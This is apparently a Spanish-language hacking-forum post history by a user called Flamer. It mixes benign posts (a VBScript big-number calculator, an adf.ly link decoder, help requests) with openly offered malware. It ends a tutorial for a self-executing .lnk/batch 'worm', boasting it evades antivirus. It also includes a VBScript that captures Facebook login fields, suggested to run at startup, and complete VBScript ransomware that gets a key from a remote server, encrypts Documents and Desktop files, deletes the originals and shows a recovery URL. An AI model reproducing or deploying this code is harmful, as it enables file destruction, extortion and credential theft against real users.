00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007180B743000000000000030003000000580000800E000000400000801000000028000080000000007180B74300000000000001000100000070000080000000007180B74300000000000001000100000088000080000000007180B743000000000000010031750000A0000080000000007180B74300000000000001000A0C0000B8000000000000007180B743000000000000010000000000C8000000000000007180B743000000000000010000000000D8000000F040000028020000B0040000000000001843000014000000B0040000000000002C430000E8020000B0040000000000000000000000000000280234000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE000001000000010000000000000001000000000000000000000000000400000001000000000000000000000000000000440000000000560061007200460069006C00650049006E0066006F00000000002400040000005400720061006E0073006C006100740069006F006E00000000000A0CB00488010000010053007400720069006E006700460069006C00650049006E0066006F00000064010000010030004300300041003000340042003000000044002200010043006F006D00700061006E0079004E0061006D006500000000004100670065006E00630069006100200043007200610063006B0069006E00670000000000340014000100500072006F0064007500630074004E0061006D00650000000000500072006F0079006500630074006F00310000002C000A000100460069006C006500560065007200730069006F006E000000000031002E00300030000000000030000A000100500072006F006400750063007400560065007200730069006F006E00000031002E00300030000000000034001200010049006E007400650072006E0061006C004E0061006D00650000004B0065007900470065006E006D0065000000000044001A0001004F0072006900670069006E0061006C00460069006C0065006E0061006D00650000004B0065007900470065006E006D0065002E00650078006500000000000000010001002040000001000400E802000031752800000020000000400000000100040000000000800200000000000000000000000000000000000000000000000080000080000000808000800000008000800080800000C0C0C000808080000000FF0000FF000000FFFF00FF000000FF00FF00FFFF0000FFFFFF00FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF999FF9FFF999FF99FF9FF9F9F9FF9FF9FFF9F9FF9FF9F9FF9F9FF9F9F9FF9F9FFFF9F9FF9FF9F9FFFF9F9FF9F9FF9F9FFFFFF9FFF999F9FFFF99FFF9F9FF9F9FFFFFF99FFFF9F9FF9F9F9FF9F99F9F9FFFF9F9F9999FFF99FF9FF9F9F9F9FFF9FFF9FFFFFFFFFFFFFF9FFFFFFFFFFFFF999FFFFFFFFFFFFFFF9FFFF9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF99999FFFF999FFFFFFFFFFFFFFFFFFFFF9FFF9FF9FFFFFFFFFFFFFFFFFFFFFFFF9FFFF9F9999FFFFFFFFFFFFFFFFFFFFF9FFFF9F9FF9FFFFFFFFFFFFFFFFFFFFF9FFFF9FF99FFFFFFFFFFFFFFFFFFFFFF9FFFF9FFFFFFFFFFFFFFFFFFFFFFFFFF9FFF9FFFFFFFFFFFFFFFFFFFFFFFFFF99999FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF999FFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFF9FFFFFFFFFFFFFFFFFFF999F999F9999FF999FF999F999F9999FF9FFF9FF9FFFF9FFFF9FFFFF9F9FF9FFF99999FFF99FF9999F9FFFFF9FF999FFFF9F9FFF9FF9F9FF9F9FF9FF9FFFF9FFFF9F9FFFF9999F99FFF999F99FF99FFFFF9F9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFFFFFFFFFFFFFFFFFFF9FFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  2.  


ahora nos ase falta el acceso directo el cuan anterior mente llamamos "6.lnk" y contendrá lo mismo en el campo destino

C:\Windows\System32\cmd.exe /c type w.lnk> worm.bat&worm.bat

ahora ya para terminar pasaremos a juntarlos con el simbolo del sistema y teclearemos esto


copy /b 6.lnk+comandos.bat+code.txt w.lnk


como resultado nos creara el archivo "w.lnk" el cual si ejecutamos %&$+#01(*%$  ya saben lo que pasa jajajajaja

Saludos Flamer y hay esta el tutorial que prometí ase muchos años Feliz Abril Negro

Nota: y si le pasan el virustotal verán que ninguno lo detecta hasta ahora


3  Seguridad Informática / Análisis y Diseño de Malware / Análizando Code De virus en: 20 Marzo 2017, 23:22
bueno como todo esta dormido por aqui, asi que les dejo un código de un virus que me encontré en una memoria USB

http://www.mediafire.com/file/rcpso4iy9f9bn2t/virus_js.rar

A ver quien es el voluntario que lo destripe

Saludos Flamer y si no lo destripa nadie tendré que hacerlo yo
4  Comunicaciones / Dispositivos Móviles (PDA's, Smartphones, Tablets) / Ayuda Recuperar pantalla de inicio de mi android polaroid en: 21 Enero 2017, 21:16
hola amigos por querer eliminar un virus de mi celular borre por accidente la pantalla de inicio de mi celular o para que me entiendan el menu.

solo puedo entrar en ajustes de configuración y a las opciones de tengo en las pestañas de arriba de la pantalla de mi celular pero las aplicaciones instaladas no.


soy usurio root y el modelo es un polaroid pspc505

saludos y mi duda es que apk tengo que instalar y de donde
5  Programación / Scripting / [Aporte] Super Calculadora en: 31 Diciembre 2016, 20:36
ahora vengo con otro código una calculadora en Vbscript de numeros grandes
la idea me surgio al ver esta pagina: http://www.elguille.info/NET/dotnet/operarConNumerosGrandes1.htm

pero en algunas operaciones observe que no daba el resultado correcto así que hice la mía mejor

Nota: si ponen muy grandes tardara en hacer la operación

Aquí el code

Código
  1. Option Explicit
  2.  
  3. Dim num1, num2, n, m, x, op, r,v
  4.  
  5. num2 = inputbox("Introduce El Primer Numero")'"123654789"
  6. num1 = inputbox("Introduce Segundo Numero")'"147852369"
  7.  
  8. ReDim n(Len(num1)), m(Len(num2))
  9.  
  10. For x = 1 To Len(num1)
  11.   n(x) = CInt(Mid(num1, x, 1))
  12. Next
  13.  
  14. For x = 1 To Len(num2)
  15.   m(x) = CInt(Mid(num2, x, 1))
  16. Next
  17.  
  18. op = InputBox("1- Sumar" & vbCrLf & "2- Restar" & vbCrLf & "3- Multiplicar" & vbCrLf & "4- Dividir")
  19.  
  20. Select Case op
  21.   Case "1"
  22.      r = sumar(n, m)
  23.   Case "2"
  24.      r = RestaroDividir(n, m, op)
  25.   Case "3"
  26.      v = mmi(num1,num2)
  27.      if v = "+" then
  28.     r = multiplicar(n,m)
  29.  elseif v = "-" then
  30.         r = multiplicar(m, n)
  31.      else
  32.     r = multiplicar(n, m)
  33.  end if      
  34.   Case "4"
  35.      r = RestaroDividir(n, m, op)
  36. End Select
  37. MsgBox r
  38. r = Replace(r, " ", "")
  39.  
  40. Function Dividir(n, m)
  41. On Error Resume Next
  42.   Dim num1, num2, pf, d, x, s, j, r, mk
  43.  
  44.   num1 = Replace(Join(n), " ", "")
  45.   num2 = Replace(Join(m), " ", "")
  46.  
  47.   pf = UBound(m)
  48.  
  49.   d = Mid(num1, 1, pf)
  50.  
  51.   While pf <= UBound(n)  'pf
  52.  
  53.      Select Case mmi(d, num2)
  54.         Case "+"
  55.            x = "0"
  56.            s = "0"
  57.            ReDim md(Len(d))
  58.            For j = 1 To Len(d)
  59.               md(j) = Mid(d, j, 1)
  60.            Next
  61.            While mmi(s, d) = "-"
  62.               x = CStr(CDbl(x) + 1)
  63.  
  64.               ReDim mx(Len(x))
  65.               ReDim ms(Len(num2))
  66.  
  67.               For j = 1 To Len(num2)
  68.                  ms(j) = Mid(num2, j, 1)
  69.               Next
  70.  
  71.               For j = 1 To Len(x)
  72.                  mx(j) = Mid(x, j, 1)
  73.               Next
  74.               s = Replace(multiplicar(ms, mx), " ", "")
  75.            Wend
  76.            If mmi(s, d) <> "1" Then
  77.                x = CStr(CDbl(x) - 1)
  78.            End If
  79.  
  80.               ReDim mx(Len(x))
  81.  
  82.               For j = 1 To Len(x)
  83.                  mx(j) = Mid(x, j, 1)
  84.               Next
  85.  
  86.               mk = Split(multiplicar(mx, m), " ")
  87.  
  88.               d = Replace(RestaroDividir(mk, md, "2"), " ", "")
  89.               While Mid(d, 1, 1) = "0"
  90.                  d = Mid(d, 2, Len(d))
  91.               Wend
  92.  
  93.               r = r & x
  94.  
  95.              pf = pf + 1
  96.              d = d & n(pf)
  97.  
  98.         Case "-"
  99.            r = r & "0"
  100.            pf = pf + 1
  101.            d = d & n(pf)
  102.         Case "1"
  103.            r = r & "1"
  104.            pf = pf + 1
  105.            d = n(pf)
  106.      End Select
  107.   Wend
  108.   While Mid(r, 1, 1) = "0"
  109.      r = Mid(r, 2, Len(r))
  110.   Wend
  111.   Dividir = "Caben:-" & r & "----Sobran:-" & d
  112. End Function
  113.  
  114. Function mmi(num1, num2)
  115.   Dim x, r
  116.  
  117.   While Mid(num1, 1, 1) = "0"
  118.      num1 = Mid(num1, 2, Len(num1))
  119.   Wend
  120.   While Mid(num2, 1, 1) = "0"
  121.      num2 = Mid(num2, 2, Len(num2))
  122.   Wend
  123.  
  124.   If Len(num1) > Len(num2) Then
  125.      r = "+"
  126.   ElseIf Len(num1) = Len(num2) Then
  127.      For x = 1 To Len(num1)
  128.         If CInt(Mid(num1, x, 1)) > CInt(Mid(num2, x, 1)) Then
  129.            r = "+"
  130.            Exit For
  131.         ElseIf CInt(Mid(num1, x, 1)) < CInt(Mid(num2, x, 1)) Then
  132.            r = "-"
  133.            Exit For
  134.         End If
  135.      Next
  136.   Else
  137.      r = "-"
  138.   End If
  139.  
  140.   If (x - 1) = Len(num1) Then
  141.      mmi = "1"
  142.   Else
  143.      mmi = r
  144.   End If
  145. End Function
  146. '-------------------------------------------------------------------------------------------------------------'
  147. Function RestaroDividir(n, m, op)
  148.   Dim lm, ln, r, x
  149.  
  150.   ln = UBound(n)
  151.   lm = UBound(m)
  152.  
  153.   If ln > lm Then
  154.      r = rd(n, m, op)
  155.   ElseIf ln < lm Then
  156.      r = rd(m, n, op)
  157.   Else
  158.      For x = 1 To UBound(n)
  159.         If n(x) > m(x) Then
  160.             r = rd(n, m, op)
  161.             Exit For
  162.         ElseIf n(x) < m(x) Then
  163.             r = rd(m, n, op)
  164.             Exit For
  165.         End If
  166.      Next
  167.   End If
  168.  
  169.   If r = "" Then
  170.      If op = "2" Then
  171.         RestaroDividir = "0"
  172.      Else
  173.         RestaroDividir = "1"
  174.      End If
  175.   Else
  176.      RestaroDividir = r
  177.   End If
  178. End Function
  179.  
  180. Function rd(n, m, op)
  181.   Dim ln, lm, r
  182.  
  183.   If op = "2" Then
  184.      ln = UBound(n)
  185.      lm = UBound(m)
  186.      r = Restar(ln, lm, n, m)
  187.   Else
  188.      r = Dividir(n, m)
  189.   End If
  190.   rd = r
  191. End Function
  192. '-------------------------------------------Funcion Multiplica---------------------------------------------------'
  193. Function multiplicar(n, m)
  194.   Dim x, y, r, c, s
  195.  
  196.   ReDim a(UBound(m))
  197.  
  198.   For x = UBound(a) To 1 Step -1
  199.      r = Join(n)
  200.      s = Split(r, " ")
  201.      For y = 2 To CInt(m(x))
  202.         r = sumar(n, s)
  203.         s = Split(r, " ")
  204.      Next
  205.      a(x) = r & c
  206.      c = c & " 0"
  207.   Next
  208.  
  209.   s = Split(a(1), " ")
  210.  
  211.   For x = 2 To UBound(a)
  212.      c = Split(a(x), " ")
  213.      r = sumar(s, c)
  214.      s = Split(r, " ")
  215.   Next
  216.   multiplicar = r
  217. End Function
  218. '---------------------------------------------Funcion Restar-------------------------------------------------------'
  219. Function Restar(ln, lm, n, m)
  220.   Dim x, r, a
  221.  
  222.   For x = ln To 1 Step -1
  223.      If lm > 0 Then
  224.         If CInt(n(x)) >= CInt(m(lm)) Then
  225.            r = CStr(n(x) - m(lm)) & " " & r
  226.         Else
  227.            r = CStr(n(x) - m(lm) + 10) & " " & r
  228.            For a = x - 1 To 1 Step -1
  229.               If n(a) = 0 Then
  230.                  n(a) = 9
  231.               Else
  232.                  n(a) = n(a) - 1
  233.                  Exit For
  234.               End If
  235.            Next
  236.         End If
  237.      Else
  238.         r = CStr(n(x)) & " " & r
  239.      End If
  240.      lm = lm - 1
  241.   Next
  242.   While Mid(r, 1, 1) = "0"
  243.         r = Mid(r, 2, Len(r))
  244.   Wend
  245.   Restar = Trim(r)
  246. End Function
  247. '-----------------------------------------Funcion Sumar--------------------------------------------------------------------'
  248. Function sumar(n, m)
  249.   Dim lm, ln, r
  250.  
  251.   ln = UBound(n)
  252.   lm = UBound(m)
  253.  
  254.   If ln >= lm Then
  255.      r = s(ln, lm, n, m)
  256.   Else
  257.      r = s(lm, ln, m, n)
  258.   End If
  259.   sumar = r
  260. End Function
  261.  
  262. Function s(ln, lm, n, m)
  263.   Dim a, b, x, r
  264.   a = 0
  265.   For x = ln To 1 Step -1
  266.      If lm > 0 Then
  267.         a = CInt(n(x)) + CInt(m(lm)) + a
  268.         If a > 9 Then
  269.            b = CStr(a)
  270.            r = Mid(b, 2, 1) & " " & r
  271.            a = CInt(Mid(b, 1, 1))
  272.         Else
  273.            r = CStr(a) & " " & r
  274.            a = 0
  275.         End If
  276.      Else
  277.         a = CInt(n(x)) + a
  278.         If a > 9 Then
  279.            b = CStr(a)
  280.            r = Mid(b, 2, 1) & " " & r
  281.            a = CInt(Mid(b, 1, 1))
  282.         Else
  283.            r = CStr(a) & " " & r
  284.            a = 0
  285.         End If
  286.      End If
  287.      lm = lm - 1
  288.   Next
  289.   If a > 0 Then
  290.      r = CStr(a) & " " & r
  291.   End If
  292.   s = " " & Trim(r)
  293. End Function
  294.  
  295.  


Saludos Flamer y me dicen si tiene errores para corregirlos
6  Programación / Scripting / [duda] ejecutar un alert como si estuviera en la consola de chrome en: 28 Diciembre 2016, 02:54
hola amigos quiero crear un objecto InternetExplorer.Application en vbscript y quiero ejecutar este comando como si estubiera en la consola de chrome

Código
  1. alert("document.GetElementById.('elemento').href")

saludos Flamer y solo quiero saber si se puede
7  Programación / .NET / [Aporte] Ghost Killer Adf.ly by Flamer en: 27 Diciembre 2016, 17:44




Proyecto:   Ghost Killer  Adf.ly

         Autor:   Flamer

Referencias: https://foro.elhacker.net/net/c_adfly_killer_05-t455465.0.html;msg2080233

             Por:  Doddy

    Lenguaje:  VB:Net 2010     

Descripción: Basado en el programa de Doddy, este también decodifica los enlaces adf.ly pero con la diferencia de que este tiene un modo de trabajo invisible sin la necesidad de estar llamando al programa cada rato este a párese cuando un enlace adf.ly asido copiado al porta papeles con la decodificación ya realizada.


Código
  1. Public Class Form1
  2.    Private Sub Form1_Load(sender As System.Object, e As System.EventArgs) Handles MyBase.Load
  3.        Timer1.Interval = 3000
  4.        Timer2.Interval = 1
  5.        msg.Visible = False
  6.    End Sub
  7.  
  8.  
  9.    Function decodifica(l)
  10.        On Error Resume Next
  11.        Dim web As New Object
  12.        Dim i, f, x As Integer
  13.        Dim a, b, t, code As String
  14.  
  15.        Err.Number = 0
  16.  
  17.        web = CreateObject("Microsoft.XmlHttp")
  18.        web.open("Get ", l, False)
  19.        web.send()
  20.        code = web.responseText
  21.  
  22.  
  23.  
  24.        i = InStr(code, "var ysmm")
  25.        f = InStr(code, "var easyUrl") - i
  26.        code = Mid(code, i, f)
  27.        code = Replace(code, "var ysmm = '", "")
  28.        code = Trim(Replace(code, "';", ""))
  29.        a = ""
  30.        b = ""
  31.        If Err.Number <> 0 Then
  32.            decodifica = "...:::Error En La Decodificacion:::..."
  33.        Else
  34.            For x = 1 To Len(code)
  35.                t = (x - 1) Mod 2
  36.                If t = 0 Then
  37.                    a = a & Mid(code, x, 1)
  38.                Else
  39.                    b = Mid(code, x, 1) & b
  40.                End If
  41.            Next
  42.  
  43.  
  44.            code = System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(a & b))
  45.            decodifica = code.Substring(2)
  46.        End If
  47.  
  48.  
  49.    End Function
  50.  
  51.    Private Sub Button1_Click(sender As System.Object, e As System.EventArgs) Handles Button1.Click
  52.        If url.Text <> "" Then
  53.            If InStr(url.Text, "adf.ly") Then
  54.                Resul.Text = decodifica(url.Text)
  55.            Else
  56.                MsgBox("No Es Una url De adf.ly", , "Aviso De Error")
  57.            End If
  58.        Else
  59.            MsgBox("El Campo Esta Vasio", , "Aviso De Error")
  60.        End If
  61.  
  62.    End Sub
  63.  
  64.    Private Sub Button2_Click(sender As System.Object, e As System.EventArgs) Handles Button2.Click
  65.        Clipboard.SetData("UnicodeText", Resul.Text)
  66.        msg.Visible = True
  67.        Timer1.Start()
  68.    End Sub
  69.  
  70.    Private Sub Timer1_Tick(sender As System.Object, e As System.EventArgs) Handles Timer1.Tick
  71.        msg.Visible = False
  72.        Timer1.Stop()
  73.    End Sub
  74.  
  75.    Private Sub Button3_Click(sender As System.Object, e As System.EventArgs) Handles Button3.Click
  76.        Me.Visible = False
  77.        Timer2.Start()
  78.  
  79.    End Sub
  80.  
  81.    Private Sub Timer2_Tick(sender As System.Object, e As System.EventArgs) Handles Timer2.Tick
  82.        Dim t As String
  83.  
  84.        t = CStr(Clipboard.GetData("UnicodeText"))
  85.  
  86.        If url.Text <> t Then
  87.            If InStr(t, "adf.ly") Then
  88.                url.Text = t
  89.                Resul.Text = decodifica(t)
  90.                If Resul.Text <> "...:::Error En La Decodificacion:::..." Then
  91.                    Timer2.Stop()
  92.                    Me.Visible = True
  93.                End If
  94.  
  95.            End If
  96.        End If
  97.    End Sub
  98.  
  99.    Private Sub Button4_Click(sender As System.Object, e As System.EventArgs) Handles Button4.Click
  100.        Resul.Text = ""
  101.        url.Text = ""
  102.    End Sub
  103. End Class
  104.  
  105.  




descarga codigo fuente mas Exe: http://www.mediafire.com/file/v02ew6doec1y2dj/Ghost_Killer_adf.ly.rar
8  Programación / Scripting / [Aporte] Obtener Nombre De Usuario y Contraseña De Facebook Con Un Simple script en: 25 Diciembre 2016, 04:15
Hola aquí unas de mis travesuras con vbscript que me encanta y es un código para obtener lo escrito en un campo de texto de x pagina como ejemplo puse la pagina de facebook aquí el código

Código
  1. set IE = CreateObject("InternetExplorer.Application")
  2.  
  3. IE.Navigate "https://www.facebook.com/"
  4. IE.visible = true
  5. Do While IE.ReadyState < 4
  6. Loop
  7. while IE.LocationURL = "https://www.facebook.com/"
  8.   u = IE.document.GetElementById("email").value
  9.   p = IE.document.GetElementById("pass").value
  10. wend
  11. msgbox u & "        " & p
  12.  
  13.  

pueden probarlo si gustan y seria mas divertido si ejecutamos el script al iniciar la pc y si el usuario ve la ejecución de Internet explorer normal y rellena los campos  jajajaja

saludos Flamer y lastima que no se puede usar chrome en vbscript
9  Programación / Scripting / Como manejar números mas grandes en Vbs en: 15 Diciembre 2016, 18:57
hola amigos tengo este codigo en vbscript

Código
  1. x = (255^11)
  2. x = x - ((fix(x/5767))*5767)
  3. msgbox x
  4.  

el resultado deberia de ser 3960 pero en ves de eso me imprime 0 en el msgbox

anterior mente usaba el comando mod en la segunda linea pero me resultaba error así que use esa formula

y si en la primera linea remplazo el 11 por el 7 si me imprime el resultado correcto, pero yo quiero manejar números mas grandes que el 7 y el 11, y mi pregunta es si se puede en vbscript

saludos flamer
10  Seguridad Informática / Análisis y Diseño de Malware / Codigo De Ransomware en VBScript por Flamer en: 28 Noviembre 2016, 20:18
Hola amigos aqui con un pequeño código que se me ocurrió hace unos días como cuando no hay nada que hacer y solo te vienen ideas de como joder mas al mundo jajajaja

Y me bino ala mente de crear un código en VBScript(ya que me gusta mas por su dificultad de detección por los AV) tipo ransomware

bueno así que ni mas ni menos aquí el código


Código
  1. option explicit
  2. dim shell,fso,document,f,password,desktop,id
  3.  
  4. set shell = createobject("wscript.shell")
  5. set fso = createobject("scripting.filesystemobject")
  6.  
  7. document = shell.SpecialFolders("MyDocuments")
  8. desktop = shell.SpecialFolders("Desktop")
  9.  
  10. set f = fso.getfolder(document)
  11. id = f.drive.serialnumber
  12.  
  13. password = Contrasena(id)
  14.  
  15. cifrar(document)
  16. cifrar(desktop)
  17.  
  18. msgbox "Para Recuperar Tus Archivos Ingresa a La Direccion:" & vbcrlf & vbcrlf & "http://practicashacking.net23.net/ransomware/Recover.php" & vbcrlf & vbcrlf & "Tu ID Es: " & id,,"Programa Finalizado"
  19.  
  20. function Contrasena(id)
  21.  dim objhttp
  22.  Set objhttp = createobject("Microsoft.XmlHttp")
  23.  
  24.  objhttp.open "POST","http://practicashacking.net23.net/ransomware/index.php",false
  25.  objhttp.setRequestHeader "Content-type", "application/x-www-form-urlencoded"
  26.  objhttp.send "id=" & id
  27.  
  28.  Contrasena = objhttp.responsetext
  29. end function
  30.  
  31. function cifrar(ruta)
  32.   dim carpeta,listfiles,listfolders,f
  33.  
  34.   set carpeta = fso.getfolder(ruta)
  35.   set listfolders = carpeta.subfolders
  36.   set listfiles = carpeta.files
  37.  
  38.   for each f in listfiles
  39.      archivo(f.path)
  40.   next
  41.  
  42.   for each f in listfolders
  43.      cifrar(f.path)
  44.   next  
  45. end function
  46.  
  47. function archivo(path)
  48.   dim file,largo,i,f,b,p,n
  49.  
  50.   set file = fso.getfile(path)
  51.  
  52.   largo=file.size
  53.  
  54.   set f = file.OpenAsTextStream()
  55.   redim bytes(largo)
  56.  
  57.   n = 1
  58.  
  59.   for i=0 to largo - 1
  60.      if n = len(password) then
  61.     n = 1
  62.  else
  63.         n = n + 1  
  64.      end if  
  65.  p = asc(mid(password,n,1))
  66.      b = asc(f.read(1)) xor p
  67.  bytes(i) = chr(b)
  68.   next
  69.  
  70.   f.close  
  71.  
  72.   set f = fso.createtextfile(file.path & ".crypt")
  73.  
  74.   for n = 0 to i - 1
  75.      f.write(bytes(n))
  76.   next
  77.  
  78.   f.close
  79.   file.delete
  80. end function
  81.  
  82.  


saludos Flamer
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines